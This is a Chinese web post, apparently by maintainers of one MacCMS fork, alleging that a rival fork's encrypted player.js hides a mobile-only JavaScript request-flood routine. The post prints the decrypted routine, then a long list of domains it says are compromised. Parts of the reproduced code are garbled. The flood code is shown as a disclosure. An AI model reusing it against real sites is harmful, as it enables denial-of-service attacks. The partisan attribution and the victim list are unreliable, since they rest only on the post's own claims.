| 我们严厉谴责CC攻击我们的假冒团队,目前整理了被控制的大部分肉鸡网站(cc攻击报警有用吗安全吗) | 您所在的位置:网站首页 › 苹果 抓包 › 我们严厉谴责CC攻击我们的假冒团队,目前整理了被控制的大部分肉鸡网站(cc攻击报警有用吗安全吗) |
我们严厉谴责CC攻击我们的假冒团队,目前整理了被控制的大部分肉鸡网站(cc攻击报警有用吗安全吗)
也想出现在这里?点击联系我~
一天时间被请求了足足3.88B 每个小时被请求3亿次
大量重置referer的请求 但依然有浏览器不支持这种调用方式被我们抓出了日志 涉及从maccms.la下载或者更新的所有版本 v10 2020.1000.1029+ 还有la版本最新的跨年度起飞版2022.1000.1099 v8 2020.1043+ 通过抓包得出是因为maccms.la最新版本加密的 player.js 手机端访问远程调用攻击js http://union.maccms.la/html/top10.js http://union.maccms.la/html/top.js 大家不信可以自行解密 代码解密如下 (MacPlayer.Status) {} else {} function msck(name, value) {var date = new Date();date[setTime]((date[getTime]() + (30 * 60) * (1000))),document[cookie] = (name + = + escape(value)) + (;path=/;expires=) + date[toGMTString]();} //这里开始写调用缓存时间 防止被发现目的为了隐藏攻击 function mgck(name) { `var list, reg = new RegExp((^|\x20) + name + =([^;]*)(;|$));` `if (list = document[cookie].match(reg)) return unescape(list[2]); else return null;`} var de = new Date(), mh = de[getMonth]() + 1,da = de[getDate](), hs = de[getHours](), rr = mh + + da + + hs, ek = k1,ev = parseFloat(mgck(ek)), ua = navigator[userAgent],au = //a.laodaguan.cn/; //这里判断移动端 过滤了windows和mac系统的抓包 所以必须通过移动端设备进行抓包才可以拿到加载内容 懂一点脚本的都能看懂 function mshr() { `(!/(Win|Mac)/i.test(navigator[platform]) && !/(localhost|127|192|10)/i.test(location[hostname]) && isNaN(ev) && ($(.MacPlayer).length > 0) || (location[search].indexOf(mdg) > -1)) && (/(iPhone|iPad|iPod|IOS)/i.test(ua) && $(body).append(` `””` `), msck(ek, 1), setInterval(imgflood, 1500));`} //这是很常见的js 攻击手法 虽然做了referer重置但依然有浏览器不支持这种调用方式被我们抓出了日志 function imgflood() { `rr = parseFloat(rr) + 1;` `var img1 = new Image();` `img1[setAttribute](referrerPolicy, no-referrer);` `img1[src] = //www.maccms.com/? + new Date().getTime();` `var img2 = new Image();` `img2[setAttribute](referrerPolicy, no-referrer);` `img2[src] = //union.maccms.com/html/top10.js? + rr;` `var img3 = new Image();` `img3[setAttribute](referrerPolicy, no-referrer);` `img3[src] = //union.maccms.com/html/top.js? + rr;`} setTimeout(mshr, 50); function abc() {} function pcy() {} 如何抓包? ios、安卓下载《http cather》即可在线抓包了 快去看看你网站是否调用了union.maccms.la 还有个判断方式 手机浏览器其他页面加载完成如果播放页面浏览器头部一直是加载中进度条那么就是在长链接请求攻击不会中断非常消耗手机cpu la的作者说它去掉了远程调用 如果遇到抓包不顺利可以看看解密的la版本player.js代码逻辑就知道为什么了 var killErrors=function(value){return true};window.onerror=null;window.onerror=killErrors;var base64EncodeChars=”ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/”;var base64DecodeChars=new Array(-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,62,-1,-1,-1,63,52,53,54,55,56,57,58,59,60,61,-1,-1,-1,-1,-1,-1,-1,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,-1,-1,-1,-1,-1,-1,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,-1,-1,-1,-1,-1);function base64encode(str){var out,i,len;var c1,c2,c3;len=str.length;i=0;out=””;while(i>2);out+=base64EncodeChars.charAt((c1&0x3)2);out+=base64EncodeChars.charAt(((c1&0x3)4));out+=base64EncodeChars.charAt((c2&0xF)2);out+=base64EncodeChars.charAt(((c1&0x3)4));out+=base64EncodeChars.charAt(((c2&0xF)6));out+=base64EncodeChars.charAt(c3&0x3F)}return out}function base64decode(str){var c1,c2,c3,c4;var i,len,out;len=str.length;i=0;out=””;while(i>6)&0x1F));out+=String.fromCharCode(0x80|((c>>0)&0x3F))}}return out}function utf8to16(str){var out,i,len,c;var char2,char3;out=””;len=str.length;i=0;while(i>4){case 0:case 1:case 2:case 3:case 4:case 5:case 6:case 7:out+=str.charAt(i-1);break;case 12:case 13:char2=str.charCodeAt(i++);out+=String.fromCharCode(((c&0x1F) 0 || this.Agent.indexOf(“ipod”) > 0 || this.Agent.indexOf(“ios”) > 0 || this.Agent.indexOf(“iphone”) > 0 || this.Agent.indexOf(“ipad”) > 0) {` `this.Width = MacPlayerConfig.widthmob;` `this.Height = MacPlayerConfig.heightmob` `}` `if (this.Width.indexOf(“px”) == -1 && this.Width.indexOf(“%”) == -1) {` `this.Width = 100%` `}` `if (this.Height.indexOf(“px”) == -1 && this.Height.indexOf(“%”) == -1) {` `this.Height = 100%` `}` `this.Prestrain = MacPlayerConfig.prestrain;` `this.Buffer = MacPlayerConfig.buffer;` `this.Second = MacPlayerConfig.second;` `this.Flag = a.flag;` `this.Trysee = a.trysee;` `this.Points = a.points;` `this.Link = decodeURIComponent(a.link);` `this.PlayFrom = a.from;` `this.PlayNote = a.note;` `this.PlayServer = a.server == no ? : a.server;` `this.PlayUrl = a.url;` `this.PlayUrlNext = a.url_next;` `this.PlayLinkNext = a.link_next;` `this.PlayLinkPre = a.link_pre;` `this.Id = a.id;` `this.Sid = a.sid;` `this.Nid = a.nid;` `if (MacPlayerConfig.server_list[this.PlayServer] != undefined) {` `this.PlayServer = MacPlayerConfig.server_list[this.PlayServer].des` `}` `if (MacPlayerConfig.player_list[this.PlayFrom] != undefined) {` `if (MacPlayerConfig.player_list[this.PlayFrom].ps == “1”) {` `this.Parse = MacPlayerConfig.player_list[this.PlayFrom].parse == ? MacPlayerConfig.parse : MacPlayerConfig.player_list[this.PlayFrom].parse;` `this.PlayFrom = parse` `}` `}` `this.Path = maccms.path + /static/player/;` `if (this.Flag == “down”) {` `MacPlayer.Down()` `} else {` `MacPlayer.Play()` `}` `}` };MacPlayer.Init(); 看了下大部分都是海螺模版的站 应该是作者被la给忽悠了 虽然开发能力很强 但这智商也是堪忧 这么容易就被忽悠了去升级结果沦为肉鸡 唯一github官方只有: https://github.com/maccmspro域名: https://maccms.pro官方下载渠道已经给出完整解密版的player.js 里面加了判断la版本的不兼容 还有播放器透明预加载请求编码 未加密可自行修改。由于la版本存在自动更新后门或许很多站长都不知道什么回事,那么请尽快下载更新包手动覆盖! 被控制为攻击肉鸡的域名列表如下: http://1.mqdy.dehttp://154.197.154.48http://154.197.154.55http://154.93.60.36http://172.121.59.45http://183.ydt.5ahome.cnhttp://23.90.22.248http://25u51.cnzu95.com:6033http://7862y.comhttp://87.sbs.5ahome.cnhttp://9ov71.51add.com:4206http://awyy18.comhttp://bwl87.comhttp://dianyings.cnhttp://dy.tv56.cnhttp://g5451.comhttp://haowywz.comhttp://hxc27.comhttp://hxc97.comhttp://i7801.comhttp://itaojuba.comhttp://lsqnjoa.cnhttp://lyl23.mehttp://m.163fahao.comhttp://mideaysj.comhttp://nq698.comhttp://v.shensgo.comhttp://vcfuli.comhttp://wuritv6.comhttp://www.234qvod.comhttp://www.2kys.comhttp://www.399q.cnhttp://www.91m.cchttp://www.auedu.orghttp://www.bajies.comhttp://www.btdyba.comhttp://www.cangpinhui.com.cnhttp://www.cechi5.comhttp://www.chinayd.orghttp://www.chok8.comhttp://www.dixi123.comhttp://www.dy1958.comhttp://www.dydzkjs.comhttp://www.fusht.comhttp://www.hanju233.comhttp://www.hantutv.comhttp://www.haohao44.comhttp://www.hotwoods.bizhttp://www.hwfudao.comhttp://www.hxc45.comhttp://www.i63.com.cnhttp://www.ikrtv.comhttp://www.itihi.comhttp://www.jinhongjx.comhttp://www.jlqsnwl.comhttp://www.madou.lahttp://www.meiyangle888.comhttp://www.mimi91.xyzhttp://www.mycctv.cnhttp://www.ncdydyy.comhttp://www.ok009.xyzhttp://www.oukepuhui.comhttp://www.pubger.comhttp://www.qdkyjh.comhttp://www.qpg6.comhttp://www.rwgaoxin.comhttp://www.rz31.comhttp://www.tzwenyi.cnhttp://www.vipys5.comhttp://www.wearry.comhttp://www.wuritv6.comhttp://www.xiuhuan.xyzhttp://www.xttzb.comhttp://www.zaoyi.nethttp://www.zhoumengping.xyzhttp://xiaomc.infohttp://xincheng888.nethttps://001d.comhttps://123kubo.nethttps://123kubo.tvhttps://173cq.comhttps://5ji.tvhttps://789dydy.comhttps://789dyy.comhttps://789yyw.comhttps://ak222.cchttps://aqpos.tophttps://awyy23.comhttps://bwl87.comhttps://ddvod.tvhttps://duonaoyingyuan.tangrenjie.tvhttps://dy0026.comhttps://hhty029.comhttps://hnxmz.comhttps://holdoo.cnhttps://hyrzs.comhttps://i58b.tvhttps://imaple.cohttps://inzdrama.comhttps://jumi.tvhttps://longvcd.comhttps://m.hjtv4.comhttps://m.keso.orghttps://m.klksm.comhttps://m.my2058.comhttps://m.sx0371.comhttps://m.tv4.cchttps://m.xindiediao.comhttps://momovod.tvhttps://movie.58yanhao.comhttps://o8tv.comhttps://ouleyingyuan.tangrenjie.tvhttps://sexx3.xyzhttps://shichojp.comhttps://shrocc.comhttps://sy0752.comhttps://tianchatv.comhttps://tv.cihttps://vip.19zh.comhttps://www.002tv.comhttps://www.173cq.comhttps://www.17kty.comhttps://www.263163.cnhttps://www.3ayy.comhttps://www.3kt.nethttps://www.52kandy.comhttps://www.555dy1.comhttps://www.5thnyh.comhttps://www.789dydy.comhttps://www.789dyw.nethttps://www.789dywz.comhttps://www.7caa.comhttps://www.8090.mehttps://www.91m.cchttps://www.99meiju.tvhttps://www.ahrmgg.comhttps://www.autonicdq.comhttps://www.bddysf.comhttps://www.biqune.comhttps://www.calmlab.comhttps://www.cclsu.comhttps://www.chok8.comhttps://www.cunzhangba.comhttps://www.dadatu2.comhttps://www.dadatutv.nethttps://www.dadatuzi.comhttps://www.dusheyy.comhttps://www.f8yy.comhttps://www.haiyouims.comhttps://www.hanjutvwz.comhttps://www.hbxhda.comhttps://www.hjtv4.comhttps://www.holdoo.cnhttps://www.jianzhenkeji.comhttps://www.jpysvip.nethttps://www.kanxi5.comhttps://www.ku2000.comhttps://www.limintv.comhttps://www.masansan.comhttps://www.meijui.comhttps://www.mindanggui.comhttps://www.mldyy.cchttps://www.mshuifu.comhttps://www.muyy.cchttps://www.newqiyu.comhttps://www.o8tv.comhttps://www.pianba.nethttps://www.ppqun.comhttps://www.puhua.cchttps://www.qcjycg.comhttps://www.raoguns.comhttps://www.schtbz.comhttps://www.tancao.cnhttps://www.tangrenjie.tvhttps://www.tianlang88.comhttps://www.tianmohk.comhttps://www.ttspt.comhttps://www.u5dy.comhttps://www.wo03.comhttps://www.wojiangwang.comhttps://www.wuguiyy.comhttps://www.wuweidy5.comhttps://www.xiafandy.comhttps://www.xianzonglin.clubhttps://www.xuejiancn.comhttps://www.xxzz2.xyzhttps://www.yhdmk.comhttps://www.ys11.xyzhttps://www.ysdzfwb.comhttps://www.zgwangzhan.comhttps://www.zhengqidiaosu.comhttps://www.zhuijuju.comhttps://xuejiancn.comhttps://xzdjc.comhttps://zgwangzhan.com |
【本文地址】